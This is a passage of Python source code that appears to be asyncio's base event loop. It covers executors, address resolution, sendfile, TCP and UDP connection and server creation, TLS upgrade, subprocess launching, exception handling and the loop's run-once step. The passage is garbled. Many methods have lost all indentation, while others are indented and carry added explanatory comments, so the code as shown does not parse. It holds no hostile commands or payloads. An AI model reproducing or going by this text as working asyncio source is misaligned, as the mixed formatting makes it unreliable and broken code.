if self._debug:
self._check_callback(callback, 'call_soon_threadsafe')
handle = self._call_soon(callback, args, context)
if handle._source_traceback:
del handle._source_traceback[-1]
self._write_to_self()
return handle
def run_in_executor(self, executor, func, *args):
self._check_closed()
if self._debug:
self._check_callback(func, 'run_in_executor')
if executor is None:
executor = self._default_executor
if executor is None:
executor = concurrent.futures.ThreadPoolExecutor()
self._default_executor = executor
return futures.wrap_future(
executor.submit(func, *args), loop=self)
def set_default_executor(self, executor):
self._default_executor = executor
    def _getaddrinfo_debug(self, host, port, family, type, proto, flags):
        # Debug-mode wrapper around socket.getaddrinfo(): logs the query,
        # times the (blocking) resolution, and promotes slow lookups to
        # INFO level so they stand out.
        msg = [f"{host}:{port!r}"]
        if family:
            msg.append(f'family={family!r}')
        if type:
            msg.append(f'type={type!r}')
        if proto:
            msg.append(f'proto={proto!r}')
        if flags:
            msg.append(f'flags={flags!r}')
        msg = ', '.join(msg)
        logger.debug('Get address info %s', msg)
        t0 = self.time()
        addrinfo = socket.getaddrinfo(host, port, family, type, proto, flags)
        dt = self.time() - t0
        msg = f'Getting address info {msg} took {dt * 1e3:.3f}ms: {addrinfo!r}'
        # Lookups slower than slow_callback_duration are logged at INFO.
        if dt >= self.slow_callback_duration:
            logger.info(msg)
        else:
            logger.debug(msg)
        return addrinfo
async def getaddrinfo(self, host, port, *,
family=0, type=0, proto=0, flags=0):
if self._debug:
getaddr_func = self._getaddrinfo_debug
else:
getaddr_func = socket.getaddrinfo
return await self.run_in_executor(
None, getaddr_func, host, port, family, type, proto, flags)
async def getnameinfo(self, sockaddr, flags=0):
return await self.run_in_executor(
None, socket.getnameinfo, sockaddr, flags)
async def sock_sendfile(self, sock, file, offset=0, count=None,
*, fallback=True):
if self._debug and sock.gettimeout() != 0:
raise ValueError("the socket must be non-blocking")
self._check_sendfile_params(sock, file, offset, count)
try:
return await self._sock_sendfile_native(sock, file,
offset, count)
except events.SendfileNotAvailableError as exc:
if not fallback:
raise
return await self._sock_sendfile_fallback(sock, file,
offset, count)
async def _sock_sendfile_native(self, sock, file, offset, count):
# NB: sendfile syscall is not supported for SSL sockets and
# non-mmap files even if sendfile is supported by OS
raise events.SendfileNotAvailableError(
f"syscall sendfile is not available for socket {sock!r} "
"and file {file!r} combination")
    async def _sock_sendfile_fallback(self, sock, file, offset, count):
        # Portable sendfile emulation: read the file in chunks via the
        # default executor (file I/O may block) and push each chunk out
        # with sock_sendall().  Returns the total number of bytes sent.
        if offset:
            file.seek(offset)
        blocksize = (
            min(count, constants.SENDFILE_FALLBACK_READBUFFER_SIZE)
            if count else constants.SENDFILE_FALLBACK_READBUFFER_SIZE
        )
        # One reusable buffer; memoryview slices below avoid copies.
        buf = bytearray(blocksize)
        total_sent = 0
        try:
            while True:
                if count:
                    # Shrink the final read so we never exceed `count`.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        break
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    break  # EOF
                await self.sock_sendall(sock, view[:read])
                total_sent += read
            return total_sent
        finally:
            # Leave the file positioned just past the bytes actually sent
            # so callers can resume or report progress after an error.
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
def _check_sendfile_params(self, sock, file, offset, count):
if 'b' not in getattr(file, 'mode', 'b'):
raise ValueError("file should be opened in binary mode")
if not sock.type == socket.SOCK_STREAM:
raise ValueError("only SOCK_STREAM type sockets are supported")
if count is not None:
if not isinstance(count, int):
raise TypeError(
"count must be a positive integer (got {!r})".format(count))
if count <= 0:
raise ValueError(
"count must be a positive integer (got {!r})".format(count))
if not isinstance(offset, int):
raise TypeError(
"offset must be a non-negative integer (got {!r})".format(
offset))
if offset < 0:
raise ValueError(
"offset must be a non-negative integer (got {!r})".format(
offset))
    async def create_connection(
            self, protocol_factory, host=None, port=None,
            *, ssl=None, family=0,
            proto=0, flags=0, sock=None,
            local_addr=None, server_hostname=None,
            ssl_handshake_timeout=None):
        """Connect to a TCP server.

        Create a streaming transport connection to a given Internet host
        and port: socket family AF_INET or socket.AF_INET6 depending on
        host (or family if specified), socket type SOCK_STREAM.
        protocol_factory must be a callable returning a protocol
        instance.

        Either host/port or an already-connected `sock` must be given,
        never both.  This method is a coroutine which will try to
        establish the connection in the background.  When successful,
        the coroutine returns a (transport, protocol) pair.
        """
        if server_hostname is not None and not ssl:
            raise ValueError('server_hostname is only meaningful with ssl')
        if server_hostname is None and ssl:
            # Use host as default for server_hostname. It is an error
            # if host is empty or not set, e.g. when an
            # already-connected socket was passed or when only a port
            # is given. To avoid this error, you can pass
            # server_hostname='' -- this will bypass the hostname
            # check. (This also means that if host is a numeric
            # IP/IPv6 address, we will attempt to verify that exact
            # address; this will probably fail, but it is possible to
            # create a certificate for a specific IP address, so we
            # don't judge it here.)
            if not host:
                raise ValueError('You must set server_hostname '
                                 'when using ssl without a host')
            server_hostname = host
        if ssl_handshake_timeout is not None and not ssl:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            # Resolve the remote (and optional local) addresses first.
            infos = await self._ensure_resolved(
                (host, port), family=family,
                type=socket.SOCK_STREAM, proto=proto, flags=flags, loop=self)
            if not infos:
                raise OSError('getaddrinfo() returned empty list')
            if local_addr is not None:
                laddr_infos = await self._ensure_resolved(
                    local_addr, family=family,
                    type=socket.SOCK_STREAM, proto=proto,
                    flags=flags, loop=self)
                if not laddr_infos:
                    raise OSError('getaddrinfo() returned empty list')
            exceptions = []
            # Try each resolved candidate address until one connects.
            for family, type, proto, cname, address in infos:
                try:
                    sock = socket.socket(family=family, type=type, proto=proto)
                    sock.setblocking(False)
                    if local_addr is not None:
                        for _, _, _, _, laddr in laddr_infos:
                            try:
                                sock.bind(laddr)
                                break
                            except OSError as exc:
                                msg = (
                                    f'error while attempting to bind on '
                                    f'address {laddr!r}: '
                                    f'{exc.strerror.lower()}'
                                )
                                exc = OSError(exc.errno, msg)
                                exceptions.append(exc)
                        else:
                            # Every local address failed to bind for this
                            # family; skip to the next remote candidate.
                            sock.close()
                            sock = None
                            continue
                    if self._debug:
                        logger.debug("connect %r to %r", sock, address)
                    await self.sock_connect(sock, address)
                except OSError as exc:
                    if sock is not None:
                        sock.close()
                    exceptions.append(exc)
                except:
                    # Non-OSError (e.g. CancelledError): don't leak the
                    # socket, and propagate immediately.
                    if sock is not None:
                        sock.close()
                    raise
                else:
                    break
            else:
                # No candidate could be connected to: report the failures.
                if len(exceptions) == 1:
                    raise exceptions[0]
                else:
                    # If they all have the same str(), raise one.
                    model = str(exceptions[0])
                    if all(str(exc) == model for exc in exceptions):
                        raise exceptions[0]
                    # Raise a combined exception so the user can see all
                    # the various error messages.
                    raise OSError('Multiple exceptions: {}'.format(
                        ', '.join(str(exc) for exc in exceptions)))
        else:
            if sock is None:
                raise ValueError(
                    'host and port was not specified and no sock specified')
            if sock.type != socket.SOCK_STREAM:
                # We allow AF_INET, AF_INET6, AF_UNIX as long as they
                # are SOCK_STREAM.
                # We support passing AF_UNIX sockets even though we have
                # a dedicated API for that: create_unix_connection.
                # Disallowing AF_UNIX in this method, breaks backwards
                # compatibility.
                raise ValueError(
                    f'A Stream Socket was expected, got {sock!r}')
        transport, protocol = await self._create_connection_transport(
            sock, protocol_factory, ssl, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout)
        if self._debug:
            # Get the socket from the transport because SSL transport closes
            # the old socket and creates a new SSL socket
            sock = transport.get_extra_info('socket')
            logger.debug("%r connected to %s:%r: (%r, %r)",
                         sock, host, port, transport, protocol)
        return transport, protocol
async def _create_connection_transport(
self, sock, protocol_factory, ssl,
server_hostname, server_side=False,
ssl_handshake_timeout=None):
sock.setblocking(False)
protocol = protocol_factory()
waiter = self.create_future()
if ssl:
sslcontext = None if isinstance(ssl, bool) else ssl
transport = self._make_ssl_transport(
sock, protocol, sslcontext, waiter,
server_side=server_side, server_hostname=server_hostname,
ssl_handshake_timeout=ssl_handshake_timeout)
else:
transport = self._make_socket_transport(sock, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
return transport, protocol
    async def sendfile(self, transport, file, offset=0, count=None,
                       *, fallback=True):
        """Send a file to transport.

        Return the total number of bytes which were sent.

        The method uses high-performance os.sendfile if available.

        file must be a regular file object opened in binary mode.

        offset tells from where to start reading the file. If specified,
        count is the total number of bytes to transmit as opposed to
        sending the file until EOF is reached. File position is updated on
        return or also in case of error in which case file.tell()
        can be used to figure out the number of bytes
        which were sent.

        fallback set to True makes asyncio to manually read and send
        the file when the platform does not support the sendfile syscall
        (e.g. Windows or SSL socket on Unix).

        Raise SendfileNotAvailableError if the system does not support
        sendfile syscall and fallback is False.
        """
        if transport.is_closing():
            raise RuntimeError("Transport is closing")
        # Each transport advertises its sendfile capability via the
        # _sendfile_compatible class attribute.
        mode = getattr(transport, '_sendfile_compatible',
                       constants._SendfileMode.UNSUPPORTED)
        if mode is constants._SendfileMode.UNSUPPORTED:
            raise RuntimeError(
                f"sendfile is not supported for transport {transport!r}")
        if mode is constants._SendfileMode.TRY_NATIVE:
            try:
                return await self._sendfile_native(transport, file,
                                                   offset, count)
            except events.SendfileNotAvailableError as exc:
                # Native path unavailable; fall through to the fallback
                # implementation below (unless fallback is disabled).
                if not fallback:
                    raise
        if not fallback:
            raise RuntimeError(
                f"fallback is disabled and native sendfile is not "
                f"supported for transport {transport!r}")
        return await self._sendfile_fallback(transport, file,
                                             offset, count)
async def _sendfile_native(self, transp, file, offset, count):
raise events.SendfileNotAvailableError(
"sendfile syscall is not supported")
    async def _sendfile_fallback(self, transp, file, offset, count):
        # Generic user-space copy loop used when the native sendfile path
        # is unavailable: read chunks in the executor, write them to the
        # transport, pacing writes through a flow-control helper protocol.
        if offset:
            file.seek(offset)
        blocksize = min(count, 16384) if count else 16384
        buf = bytearray(blocksize)
        total_sent = 0
        proto = _SendfileFallbackProtocol(transp)
        try:
            while True:
                if count:
                    # Never transmit more than `count` bytes in total.
                    blocksize = min(count - total_sent, blocksize)
                    if blocksize <= 0:
                        return total_sent
                view = memoryview(buf)[:blocksize]
                read = await self.run_in_executor(None, file.readinto, view)
                if not read:
                    return total_sent  # EOF
                # drain() respects the transport's write buffer limits.
                await proto.drain()
                transp.write(view[:read])
                total_sent += read
        finally:
            # Position the file just past the bytes actually sent, then
            # restore the transport's original protocol even on error.
            if total_sent > 0 and hasattr(file, 'seek'):
                file.seek(offset + total_sent)
            await proto.restore()
    async def start_tls(self, transport, protocol, sslcontext, *,
                        server_side=False,
                        server_hostname=None,
                        ssl_handshake_timeout=None):
        """Upgrade transport to TLS.

        Return a new transport that *protocol* should start using
        immediately.
        """
        if ssl is None:
            raise RuntimeError('Python ssl module is not available')
        if not isinstance(sslcontext, ssl.SSLContext):
            raise TypeError(
                f'sslcontext is expected to be an instance of ssl.SSLContext, '
                f'got {sslcontext!r}')
        if not getattr(transport, '_start_tls_compatible', False):
            raise TypeError(
                f'transport {transport!r} is not supported by start_tls()')
        waiter = self.create_future()
        ssl_protocol = sslproto.SSLProtocol(
            self, protocol, sslcontext, waiter,
            server_side, server_hostname,
            ssl_handshake_timeout=ssl_handshake_timeout,
            call_connection_made=False)
        # Pause early so that "ssl_protocol.data_received()" doesn't
        # have a chance to get called before "ssl_protocol.connection_made()".
        transport.pause_reading()
        transport.set_protocol(ssl_protocol)
        conmade_cb = self.call_soon(ssl_protocol.connection_made, transport)
        resume_cb = self.call_soon(transport.resume_reading)
        try:
            # waiter completes when the TLS handshake finishes (or fails).
            await waiter
        except Exception:
            # Failed handshake: close the transport and cancel the two
            # callbacks scheduled above so they never fire.
            transport.close()
            conmade_cb.cancel()
            resume_cb.cancel()
            raise
        return ssl_protocol._app_transport
    async def create_datagram_endpoint(self, protocol_factory,
                                       local_addr=None, remote_addr=None, *,
                                       family=0, proto=0, flags=0,
                                       reuse_address=_unset, reuse_port=None,
                                       allow_broadcast=None, sock=None):
        """Create datagram connection.

        Returns a (transport, protocol) pair for a datagram (UDP or
        UNIX-domain) endpoint: either bound locally via local_addr,
        "connected" to a peer via remote_addr, or wrapping a
        pre-configured datagram socket passed as sock.
        """
        if sock is not None:
            if sock.type != socket.SOCK_DGRAM:
                raise ValueError(
                    f'A UDP Socket was expected, got {sock!r}')
            # A pre-made socket excludes every socket-configuration kwarg.
            if (local_addr or remote_addr or
                    family or proto or flags or
                    reuse_port or allow_broadcast):
                # show the problematic kwargs in exception msg
                opts = dict(local_addr=local_addr, remote_addr=remote_addr,
                            family=family, proto=proto, flags=flags,
                            reuse_address=reuse_address, reuse_port=reuse_port,
                            allow_broadcast=allow_broadcast)
                problems = ', '.join(f'{k}={v}' for k, v in opts.items() if v)
                raise ValueError(
                    f'socket modifier keyword arguments can not be used '
                    f'when sock is specified. ({problems})')
            sock.setblocking(False)
            r_addr = None
        else:
            if not (local_addr or remote_addr):
                if family == 0:
                    raise ValueError('unexpected address family')
                addr_pairs_info = (((family, proto), (None, None)),)
            elif hasattr(socket, 'AF_UNIX') and family == socket.AF_UNIX:
                # UNIX-domain datagram sockets take string paths, not
                # (host, port) tuples.
                for addr in (local_addr, remote_addr):
                    if addr is not None and not isinstance(addr, str):
                        raise TypeError('string is expected')
                addr_pairs_info = (((family, proto),
                                    (local_addr, remote_addr)), )
            else:
                # join address by (family, protocol)
                addr_infos = collections.OrderedDict()
                for idx, addr in ((0, local_addr), (1, remote_addr)):
                    if addr is not None:
                        assert isinstance(addr, tuple) and len(addr) == 2, (
                            '2-tuple is expected')
                        infos = await self._ensure_resolved(
                            addr, family=family, type=socket.SOCK_DGRAM,
                            proto=proto, flags=flags, loop=self)
                        if not infos:
                            raise OSError('getaddrinfo() returned empty list')
                        for fam, _, pro, _, address in infos:
                            key = (fam, pro)
                            if key not in addr_infos:
                                addr_infos[key] = [None, None]
                            addr_infos[key][idx] = address
                # each addr has to have info for each (family, proto) pair
                addr_pairs_info = [
                    (key, addr_pair) for key, addr_pair in addr_infos.items()
                    if not ((local_addr and addr_pair[0] is None) or
                            (remote_addr and addr_pair[1] is None))]
                if not addr_pairs_info:
                    raise ValueError('can not get address information')
            exceptions = []
            # bpo-37228: reuse_address is rejected/deprecated because
            # SO_REUSEADDR on UDP allows port hijacking.
            if reuse_address is not _unset:
                if reuse_address:
                    raise ValueError("Passing `reuse_address=True` is no "
                                     "longer supported, as the usage of "
                                     "SO_REUSEPORT in UDP poses a significant "
                                     "security concern.")
                else:
                    warnings.warn("The *reuse_address* parameter has been "
                                  "deprecated as of 3.7.6 and is scheduled "
                                  "for removal in 3.11.", DeprecationWarning,
                                  stacklevel=2)
            # Try each (family, proto) candidate until one succeeds.
            for ((family, proto),
                 (local_address, remote_address)) in addr_pairs_info:
                sock = None
                r_addr = None
                try:
                    sock = socket.socket(
                        family=family, type=socket.SOCK_DGRAM, proto=proto)
                    if reuse_port:
                        _set_reuseport(sock)
                    if allow_broadcast:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                    sock.setblocking(False)
                    if local_addr:
                        sock.bind(local_address)
                    if remote_addr:
                        if not allow_broadcast:
                            await self.sock_connect(sock, remote_address)
                        r_addr = remote_address
                except OSError as exc:
                    if sock is not None:
                        sock.close()
                    exceptions.append(exc)
                except:
                    # Non-OSError: don't leak the socket, propagate.
                    if sock is not None:
                        sock.close()
                    raise
                else:
                    break
            else:
                raise exceptions[0]
        protocol = protocol_factory()
        waiter = self.create_future()
        transport = self._make_datagram_transport(
            sock, protocol, r_addr, waiter)
        if self._debug:
            if local_addr:
                logger.info("Datagram endpoint local_addr=%r remote_addr=%r "
                            "created: (%r, %r)",
                            local_addr, remote_addr, transport, protocol)
            else:
                logger.debug("Datagram endpoint remote_addr=%r created: "
                             "(%r, %r)",
                             remote_addr, transport, protocol)
        try:
            # Wait for connection_made(); close the transport on failure.
            await waiter
        except:
            transport.close()
            raise
        return transport, protocol
async def _ensure_resolved(self, address, *,
family=0, type=socket.SOCK_STREAM,
proto=0, flags=0, loop):
host, port = address[:2]
info = _ipaddr_info(host, port, family, type, proto, *address[2:])
if info is not None:
# "host" is already a resolved IP.
return [info]
else:
return await loop.getaddrinfo(host, port, family=family, type=type,
proto=proto, flags=flags)
async def _create_server_getaddrinfo(self, host, port, family, flags):
infos = await self._ensure_resolved((host, port), family=family,
type=socket.SOCK_STREAM,
flags=flags, loop=self)
if not infos:
raise OSError(f'getaddrinfo({host!r}) returned empty list')
return infos
    async def create_server(
            self, protocol_factory, host=None, port=None,
            *,
            family=socket.AF_UNSPEC,
            flags=socket.AI_PASSIVE,
            sock=None,
            backlog=100,
            ssl=None,
            reuse_address=None,
            reuse_port=None,
            ssl_handshake_timeout=None,
            start_serving=True):
        """Create a TCP server.

        The host parameter can be a string, in that case the TCP server is
        bound to host and port.

        The host parameter can also be a sequence of strings and in that case
        the TCP server is bound to all hosts of the sequence. If a host
        appears multiple times (possibly indirectly e.g. when hostnames
        resolve to the same IP address), the server is only bound once to that
        host.

        Return a Server object which can be used to stop the service.

        This method is a coroutine.
        """
        if isinstance(ssl, bool):
            raise TypeError('ssl argument must be an SSLContext or None')
        if ssl_handshake_timeout is not None and ssl is None:
            raise ValueError(
                'ssl_handshake_timeout is only meaningful with ssl')
        if host is not None or port is not None:
            if sock is not None:
                raise ValueError(
                    'host/port and sock can not be specified at the same time')
            if reuse_address is None:
                # SO_REUSEADDR is safe and conventional on POSIX; it has
                # different semantics elsewhere, so default it off there.
                reuse_address = os.name == 'posix' and sys.platform != 'cygwin'
            sockets = []
            if host == '':
                # Empty string means: bind to the wildcard address.
                hosts = [None]
            elif (isinstance(host, str) or
                  not isinstance(host, collections.abc.Iterable)):
                hosts = [host]
            else:
                hosts = host
            # Resolve all hosts concurrently, then deduplicate results
            # (several hostnames may resolve to the same address).
            fs = [self._create_server_getaddrinfo(host, port, family=family,
                                                  flags=flags)
                  for host in hosts]
            infos = await tasks.gather(*fs, loop=self)
            infos = set(itertools.chain.from_iterable(infos))
            completed = False
            try:
                for res in infos:
                    af, socktype, proto, canonname, sa = res
                    try:
                        sock = socket.socket(af, socktype, proto)
                    except socket.error:
                        # Assume it's a bad family/type/protocol combination.
                        if self._debug:
                            logger.warning('create_server() failed to create '
                                           'socket.socket(%r, %r, %r)',
                                           af, socktype, proto, exc_info=True)
                        continue
                    sockets.append(sock)
                    if reuse_address:
                        sock.setsockopt(
                            socket.SOL_SOCKET, socket.SO_REUSEADDR, True)
                    if reuse_port:
                        _set_reuseport(sock)
                    # Disable IPv4/IPv6 dual stack support (enabled by
                    # default on Linux) which makes a single socket
                    # listen on both address families.
                    if (_HAS_IPv6 and
                            af == socket.AF_INET6 and
                            hasattr(socket, 'IPPROTO_IPV6')):
                        sock.setsockopt(socket.IPPROTO_IPV6,
                                        socket.IPV6_V6ONLY,
                                        True)
                    try:
                        sock.bind(sa)
                    except OSError as err:
                        raise OSError(err.errno, 'error while attempting '
                                      'to bind on address %r: %s'
                                      % (sa, err.strerror.lower())) from None
                completed = True
            finally:
                # Binding failed part-way: close every socket opened so far.
                if not completed:
                    for sock in sockets:
                        sock.close()
        else:
            if sock is None:
                raise ValueError('Neither host/port nor sock were specified')
            if sock.type != socket.SOCK_STREAM:
                raise ValueError(f'A Stream Socket was expected, got {sock!r}')
            sockets = [sock]
        for sock in sockets:
            sock.setblocking(False)
        server = Server(self, sockets, protocol_factory,
                        ssl, backlog, ssl_handshake_timeout)
        if start_serving:
            server._start_serving()
            # Skip one loop iteration so that all 'loop.add_reader'
            # go through.
            await tasks.sleep(0, loop=self)
        if self._debug:
            logger.info("%r is serving", server)
        return server
async def connect_accepted_socket(
self, protocol_factory, sock,
*, ssl=None,
ssl_handshake_timeout=None):
"""Handle an accepted connection.
This is used by servers that accept connections outside of
asyncio but that use asyncio to handle connections.
This method is a coroutine. When completed, the coroutine
returns a (transport, protocol) pair.
"""
if sock.type != socket.SOCK_STREAM:
raise ValueError(f'A Stream Socket was expected, got {sock!r}')
if ssl_handshake_timeout is not None and not ssl:
raise ValueError(
'ssl_handshake_timeout is only meaningful with ssl')
transport, protocol = await self._create_connection_transport(
sock, protocol_factory, ssl, '', server_side=True,
ssl_handshake_timeout=ssl_handshake_timeout)
if self._debug:
# Get the socket from the transport because SSL transport closes
# the old socket and creates a new SSL socket
sock = transport.get_extra_info('socket')
logger.debug("%r handled: (%r, %r)", sock, transport, protocol)
return transport, protocol
async def connect_read_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_read_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Read pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
async def connect_write_pipe(self, protocol_factory, pipe):
protocol = protocol_factory()
waiter = self.create_future()
transport = self._make_write_pipe_transport(pipe, protocol, waiter)
try:
await waiter
except:
transport.close()
raise
if self._debug:
logger.debug('Write pipe %r connected: (%r, %r)',
pipe.fileno(), transport, protocol)
return transport, protocol
def _log_subprocess(self, msg, stdin, stdout, stderr):
info = [msg]
if stdin is not None:
info.append(f'stdin={_format_pipe(stdin)}')
if stdout is not None and stderr == subprocess.STDOUT:
info.append(f'stdout=stderr={_format_pipe(stdout)}')
else:
if stdout is not None:
info.append(f'stdout={_format_pipe(stdout)}')
if stderr is not None:
info.append(f'stderr={_format_pipe(stderr)}')
logger.debug(' '.join(info))
async def subprocess_shell(self, protocol_factory, cmd, *,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=False,
shell=True, bufsize=0,
**kwargs):
if not isinstance(cmd, (bytes, str)):
raise ValueError("cmd must be a string")
if universal_newlines:
raise ValueError("universal_newlines must be False")
if not shell:
raise ValueError("shell must be True")
if bufsize != 0:
raise ValueError("bufsize must be 0")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = 'run shell command %r' % cmd
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, cmd, True, stdin, stdout, stderr, bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
async def subprocess_exec(self, protocol_factory, program, *args,
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=False,
shell=False, bufsize=0, **kwargs):
if universal_newlines:
raise ValueError("universal_newlines must be False")
if shell:
raise ValueError("shell must be False")
if bufsize != 0:
raise ValueError("bufsize must be 0")
popen_args = (program,) + args
for arg in popen_args:
if not isinstance(arg, (str, bytes)):
raise TypeError(
f"program arguments must be a bytes or text string, "
f"not {type(arg).__name__}")
protocol = protocol_factory()
debug_log = None
if self._debug:
# don't log parameters: they may contain sensitive information
# (password) and may be too long
debug_log = f'execute program {program!r}'
self._log_subprocess(debug_log, stdin, stdout, stderr)
transport = await self._make_subprocess_transport(
protocol, popen_args, False, stdin, stdout, stderr,
bufsize, **kwargs)
if self._debug and debug_log is not None:
logger.info('%s: %r', debug_log, transport)
return transport, protocol
def get_exception_handler(self):
"""Return an exception handler, or None if the default one is in use.
"""
return self._exception_handler
def set_exception_handler(self, handler):
"""Set handler as the new event loop exception handler.
If handler is None, the default exception handler will
be set.
If handler is a callable object, it should have a
signature matching '(loop, context)', where 'loop'
will be a reference to the active event loop, 'context'
will be a dict object (see `call_exception_handler()`
documentation for details about context).
"""
if handler is not None and not callable(handler):
raise TypeError(f'A callable object or None is expected, '
f'got {handler!r}')
self._exception_handler = handler
    def default_exception_handler(self, context):
        """Default exception handler.

        This is called when an exception occurs and no exception
        handler is set, and can be called by a custom exception
        handler that wants to defer to the default behavior.

        This default handler logs the error message and other
        context-dependent information. In debug mode, a truncated
        stack trace is also appended showing where the given object
        (e.g. a handle or future or task) was created, if any.

        The context parameter has the same meaning as in
        `call_exception_handler()`.
        """
        message = context.get('message')
        if not message:
            message = 'Unhandled exception in event loop'
        exception = context.get('exception')
        if exception is not None:
            exc_info = (type(exception), exception, exception.__traceback__)
        else:
            exc_info = False
        # Attach the creation traceback of the handle currently being
        # executed, unless the context already carries its own.
        if ('source_traceback' not in context and
                self._current_handle is not None and
                self._current_handle._source_traceback):
            context['handle_traceback'] = \
                self._current_handle._source_traceback
        log_lines = [message]
        # Render remaining context entries in sorted-key order; the
        # traceback lists are formatted as readable multi-line text.
        for key in sorted(context):
            if key in {'message', 'exception'}:
                continue
            value = context[key]
            if key == 'source_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Object created at (most recent call last):\n'
                value += tb.rstrip()
            elif key == 'handle_traceback':
                tb = ''.join(traceback.format_list(value))
                value = 'Handle created at (most recent call last):\n'
                value += tb.rstrip()
            else:
                value = repr(value)
            log_lines.append(f'{key}: {value}')
        logger.error('\n'.join(log_lines), exc_info=exc_info)
    def call_exception_handler(self, context):
        """Call the current event loop's exception handler.

        The context argument is a dict containing the following keys:

        - 'message': Error message;
        - 'exception' (optional): Exception object;
        - 'future' (optional): Future instance;
        - 'task' (optional): Task instance;
        - 'handle' (optional): Handle instance;
        - 'protocol' (optional): Protocol instance;
        - 'transport' (optional): Transport instance;
        - 'socket' (optional): Socket instance;
        - 'asyncgen' (optional): Asynchronous generator that caused
          the exception.

        New keys maybe introduced in the future.

        Note: do not overload this method in an event loop subclass.
        For custom exception handling, use the
        `set_exception_handler()` method.
        """
        if self._exception_handler is None:
            try:
                self.default_exception_handler(context)
            except Exception:
                # Second protection layer for unexpected errors
                # in the default implementation, as well as for subclassed
                # event loops with overloaded "default_exception_handler".
                logger.error('Exception in default exception handler',
                             exc_info=True)
        else:
            try:
                self._exception_handler(self, context)
            except Exception as exc:
                # Exception in the user set custom exception handler.
                try:
                    # Let's try default handler.
                    self.default_exception_handler({
                        'message': 'Unhandled error in exception handler',
                        'exception': exc,
                        'context': context,
                    })
                except Exception:
                    # Guard 'default_exception_handler' in case it is
                    # overloaded.
                    logger.error('Exception in default exception handler '
                                 'while handling an unexpected error '
                                 'in custom exception handler',
                                 exc_info=True)
    def _add_callback(self, handle):
        """Add a Handle to _scheduled (TimerHandle) or _ready."""
        # Despite the historical docstring above, this method only ever
        # appends plain Handles to the ready queue; TimerHandles go
        # through call_at()/heappush and are rejected here.
        assert isinstance(handle, events.Handle), 'A Handle is required here'
        if handle._cancelled:
            return
        assert not isinstance(handle, events.TimerHandle)
        self._ready.append(handle)
    def _add_callback_signalsafe(self, handle):
        """Like _add_callback() but called from a signal handler."""
        self._add_callback(handle)
        # Wake the selector: a signal can arrive while the loop is
        # blocked in select(), and the callback must run promptly.
        self._write_to_self()
    def _timer_handle_cancelled(self, handle):
        """Notification that a TimerHandle has been cancelled."""
        # Cancelled timers stay in the heap; just count them so that
        # _run_once() can compact the heap once too many accumulate.
        if handle._scheduled:
            self._timer_cancelled_count += 1
    def _run_once(self):
        """Run one full iteration of the event loop.

        This calls all currently ready callbacks, polls for I/O,
        schedules the resulting callbacks, and finally schedules
        'call_later' callbacks.
        """
        sched_count = len(self._scheduled)
        if (sched_count > _MIN_SCHEDULED_TIMER_HANDLES and
                self._timer_cancelled_count / sched_count >
                _MIN_CANCELLED_TIMER_HANDLES_FRACTION):
            # Remove delayed calls that were cancelled if their number
            # is too high
            new_scheduled = []
            for handle in self._scheduled:
                if handle._cancelled:
                    handle._scheduled = False
                else:
                    new_scheduled.append(handle)
            heapq.heapify(new_scheduled)
            self._scheduled = new_scheduled
            self._timer_cancelled_count = 0
        else:
            # Remove delayed calls that were cancelled from head of queue.
            while self._scheduled and self._scheduled[0]._cancelled:
                self._timer_cancelled_count -= 1
                handle = heapq.heappop(self._scheduled)
                handle._scheduled = False
        # Choose the select() timeout: 0 when work is already pending
        # (or we're stopping), else until the earliest scheduled timer,
        # else block indefinitely (None).
        timeout = None
        if self._ready or self._stopping:
            timeout = 0
        elif self._scheduled:
            # Compute the desired timeout.
            when = self._scheduled[0]._when
            timeout = min(max(0, when - self.time()), MAXIMUM_SELECT_TIMEOUT)
        if self._debug and timeout != 0:
            t0 = self.time()
            event_list = self._selector.select(timeout)
            dt = self.time() - t0
            if dt >= 1.0:
                level = logging.INFO
            else:
                level = logging.DEBUG
            nevent = len(event_list)
            if timeout is None:
                logger.log(level, 'poll took %.3f ms: %s events',
                           dt * 1e3, nevent)
            elif nevent:
                logger.log(level,
                           'poll %.3f ms took %.3f ms: %s events',
                           timeout * 1e3, dt * 1e3, nevent)
            elif dt >= 1.0:
                logger.log(level,
                           'poll %.3f ms took %.3f ms: timeout',
                           timeout * 1e3, dt * 1e3)
        else:
            event_list = self._selector.select(timeout)
        self._process_events(event_list)
        # Handle 'later' callbacks that are ready.
        end_time = self.time() + self._clock_resolution
        while self._scheduled:
            handle = self._scheduled[0]
            if handle._when >= end_time:
                break
            handle = heapq.heappop(self._scheduled)
            handle._scheduled = False
            self._ready.append(handle)
        # This is the only place where callbacks are actually *called*.
        # All other places just add them to ready.
        # Note: We run all currently scheduled callbacks, but not any
        # callbacks scheduled by callbacks run this time around --
        # they will be run the next time (after another I/O poll).
        # Use an idiom that is thread-safe without using locks.
        ntodo = len(self._ready)
        for i in range(ntodo):
            handle = self._ready.popleft()
            if handle._cancelled:
                continue
            if self._debug:
                try:
                    self._current_handle = handle
                    t0 = self.time()
                    handle._run()
                    dt = self.time() - t0
                    if dt >= self.slow_callback_duration:
                        logger.warning('Executing %s took %.3f seconds',
                                       _format_handle(handle), dt)
                finally:
                    self._current_handle = None
            else:
                handle._run()
        handle = None  # Needed to break cycles when an exception occurs.
def _set_coroutine_origin_tracking(self, enabled):
